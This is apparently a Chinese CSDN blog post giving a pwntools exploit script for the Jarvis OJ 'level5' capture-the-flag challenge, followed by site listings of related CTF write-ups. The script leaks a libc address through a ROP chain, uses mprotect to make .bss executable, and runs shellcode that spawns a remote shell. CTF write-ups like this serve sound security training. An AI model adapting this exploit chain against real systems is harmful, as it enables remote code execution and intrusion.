Jarvis

最新推荐文章于 2023-04-16 01:50:03 发布
最新推荐文章于 2023-04-16 01:50:03 发布
阅读量148 收藏
点赞数
分类专栏: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YangZiTrick/article/details/111385992
版权

level5

exp:

from pwn import *
#context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
#p = process('./level3_x64')
p = remote('pwn2.jarvisoj.com','9884')
#p = remote('127.0.0.1',12345)
libc=ELF('./libc-2.19.so')
elf=ELF('./level3_x64')
context.log_level='debug'

write_got = elf.got['write']
write_plt = elf.plt['write']
read_got = elf.got['read']
read_plt = elf.plt['read']
bss_addr = elf.bss()
pop_rdi = 0x00000000004006b3
pop_rsi_r15 = 0x00000000004006b1
vuln_addr = 0x00000000004005E6
pop_rbx_rbp = 0x00000000004006AA
mov_rdx_r13 = 0x0000000000400690

payload1 = 'a'*(0x80+8) 
payload1 += p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(write_got) + p64(1) + p64(write_plt) + p64(vuln_addr)
p.sendline(payload1)
p.recvline()
write_addr = u64(p.recv(6).ljust(8,b'\x00'))   
print(hex(write_addr))

libc_bash = write_addr - libc.symbols['write']
mprotect_addr = libc_bash + libc.symbols['mprotect']

payload2 = 'a'*(0x80+8) 
payload2 += p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(bss_addr) + p64(1) + p64(read_plt) + p64(vuln_addr)
p.sendline(payload2)
shellcode=p64(mprotect_addr)+asm(shellcraft.amd64.sh(),arch='amd64')
p.sendline(shellcode)

#p.recvline()
payload3 = 'a'*(0x80+8)
payload3 += p64(pop_rbx_rbp) + p64(0) + p64(1) + p64(bss_addr) + p64(7) + p64(0x1000) + p64(0x600000) + p64(mov_rdx_r13)
payload3 += p64(0)*7 + p64(bss_addr+8)
p.sendline(payload3)
p.interactive()
_Trick_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
jarvis
03-08
wasm-pack-template 用于使用启动Rust和WebAssembly项目的模板。|内置 :crab: :spider_web: 由关于 该模板用于将Rust库编译到WebAssembly中,并将结果包发布到NPM。 一定要检查出为其他模板和用法wasm-pack 。...
jarvis OJ
CHOOOU的博客
11-05 775
basic Baby’s Crack 程序大概就是打开一个命令行输入的 file,然后打开一个 tmp,对 file 加密写入 tmp,将 file 删除,将 tmp 重命名为 file。 直接在 ida 中 F5,关键的代码就是: while (feof(*(_QWORD *)&argc, argv, v8, v16) == 0)
Jarvis OJ—Web
m0re's blog
09-19 609
Web PORT51 使用51端口,但是修改端口的话,32770就不是这道题的了,所以应该是使用本地的端口51来访问。所以就需要用到curl命令。curl命令可以进行学习一下,回头有空学习一下。 LOCALHOST 本地访问,简单题,设置一下hosts文件就行,将题目网址加上去就OK。也可以使用插件刷新一下得到flag Login 登录,但是尝试了几个弱口令,还进行了爆破,不过没有得到flag,所以抓包抓包看看返回结果这里有个hint, "select * from `admin` where p.
Jarvis OJ web(一)
Lemon's blog
10-04 933
前言:总结一下最近做过的jarvisoj的web题,有的很有意思,能学习到很多新知识 LOCALHOST 提示很明显,伪造IP地址即可 抓包进行伪造,即可得出flag Login 一个提交页面,源码中也没有发现什么线索,抓包来看一下 有一句提示 "select * from `admin` where password='".md5($pass,true)."'" 这里就涉及到MD5函数...
HTB-Jarvis
TA不懒,但还没有添加简介
04-16 260
HTB-Jarvis
Jarvis声音.zip
09-28
钢铁侠贾维斯提示声QQ提示声钢铁侠贾维斯提示声QQ提示声电脑提示音钢铁侠贾维斯提示声QQ提示声钢铁侠贾维斯提示声QQ提示声电脑提示音
jarvis:Jarvis框架
05-13
Jarvis是轻量级的管理框架 一,职能 登录(多租户,切换租户) 登出 登记 重设密码 轮廓 租户信息 租户管理(CRUD) 组织管理(CRUD,权限数据) 帐户管理(CRUD,角色,锁定/解锁) 角色管理(CRUD,权限功能)...
checksec
Trick的博客
11-10 2549
checksec checksec到底是用来干什么的? 它是用来检查可执行文件属性,例如PIE, RELRO, PaX, Canaries, ASLR, Fortify Source等等属性。 我们在ubuntu下使用它时,会显示有5行信息: 1.Arch 从这行信息可以知道程序是32bit还是64bit的 2.RELRO 3.Stack 显示Stack:No canary found则表示可以利用栈溢出 编译时控制是否开启栈保护以及程度: gcc -fno-stack-protector -o test
not_the_same_3dsctf_2016
Trick的博客
11-26 802
IDA main函数发现栈溢出 长度2d 在函数列表找到 get_secret()函数 知道flag被存在了bss段上的fl4g中 一开始的想法是用main函数的printf把flag输出,但发现好像行不通 后来在列表中找到了write函数 函数地址可以用elf.sym[‘write’]表示,也可以直接用test段的地址,都一样 exp: from pwn import * context.log_level='debug' p = remote('node3.buuoj.cn',29167) e
Pwn_CTFShow_01
Trick的博客
11-08 739
Pwn_CTFShow1.PWN签到题2.pwn02 1.PWN签到题 直接 nc 出flag,白给 2.pwn02 file 一下 32bit IDA分析 发现 bin/sh 地址 可以用 cyclic生成字符串,然后gdb run一下,再计算出偏移 cyclic -l 0x...... exp: from pwn import * #p=process('') p=remote('111.231.70.44',28042) paylode='a'*13 + p32(0x8048518)
Pwn_BUUCTF
Trick的博客
11-08 612
Pwn_BUUCTF1.test_your_nc2.ripIDA查看写脚本 1.test_your_nc 直接 nc cat flag 直接出flag,白给题 2.rip IDA查看 拉文件进 IDA 看main: 直接进 gets 找 s 发现偏移:0xF + 8 写exp paylode=a*(0xF+8) 回到 IDA 看到 “/bin/sh” 的地址 :40118A 写脚本 完整exp from pwn import * p=remote('node3.buuoj
Pwn_CTFShow_02
Trick的博客
11-08 591
Pwn_CTFShow_0101栈溢出之ret2text 01栈溢出之ret2text 很简单的一个栈溢出 直接IDA分析 从main函数跟进到welcome函数 get() 很明显的溢出 payload = 'a'*(0x80+8) 因为是64位的,所以后面要加上8 Shift+F12 发现/bin/sh 果然够简单的。。。 双击进去 再双击 找到地址 exp: from pwn import * p=remote('111.231.70.44',28072) payload='a'*(0
one_gadget
Trick的博客
11-27 537
[BJDCTF 2nd]one_gadget ida看main函数 再看init函数 会输出一个printf的地址 使用one_gadget,计算一下libc的基址 buuctf给了远程的libc文件,下载下来 one_gadget [libcfilename] exp: from pwn import * context.log_level='debug' p=remote('node3.buuoj.cn',25812) libc=ELF('./libc-2.29.so') p.recvunt
Pwn_0xGame_01
Trick的博客
11-08 526
Pwn_0xGame1.欢迎来到0xGame平台2.帮我取一个题目名称ret2text3.easy_stack4.该怎么起名呢shellcode5.variable_coverage变量覆盖 1.欢迎来到0xGame平台 nc出flag 2.帮我取一个题目名称 ret2text 打开IDA分析 main函数 跟进 第二个函数 s栈大小为20h=32 函数最后return read了s 所以很好写了 因为是64位程序,后面再加上8个字符 payload = 'a' * (0x20+8) Shift+F1
整形溢出
Trick的博客
11-23 448
[BJDCTF 2nd]r2t3 来自buuctf 先看ida buf缓冲区大小为408h,而read读取大小为400h,比buf要小,所以不能进行简单的缓冲区栈溢出。 再看name_check函数,v3是int8类型的变量,1111 1111 = 0xFF = 255。当0xFF +1的时侯,变量发生整形溢出,0x100 = 256 此时v3的数值为零(0000 0000),但是这只是显示了一个字节,其实再计算机里面会溢出,前面会进行进位操作变成 1 0000 0000。 同时还要满足3< v3
Pwn_0xGame_02
Trick的博客
11-08 429
Pwn_0xGame_021.Pwn题滞销,帮帮我好吗?syscall 1.Pwn题滞销,帮帮我好吗? syscall IDA打开 发现是个syscall的题目 直接去看这个函数的汇编 根据师傅们所说,我们需要让rax存入59,让syscall去调用execve函数 (ret2syscall?) syscall_64 GitHub查询 之后要构造出来 execve("/bin/sh",0,0) 拿取权限 找"/bin/sh"字符串 方法一: 在程序中有,找到它 从’[‘数起到斜杠前面的空格’ ',再
Pwn_buuctf_ciscn_2019_c_1
Trick的博客
11-20 424
libc64 ida查看 在main函数没有发现明显漏洞 跟进encrypt()函数 发现了gets()和puts()函数,可以利用gets的栈溢出泄漏出puts的地址,从而找到libc版本信息getshell exp: from pwn import * from LibcSearcher import * p= remote('node3.buuoj.cn',25412) #p= remote('127.0.0.1',12345) #p = process('./ciscn_2019_c_1') #
jarvisoj_level0
最新发布
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值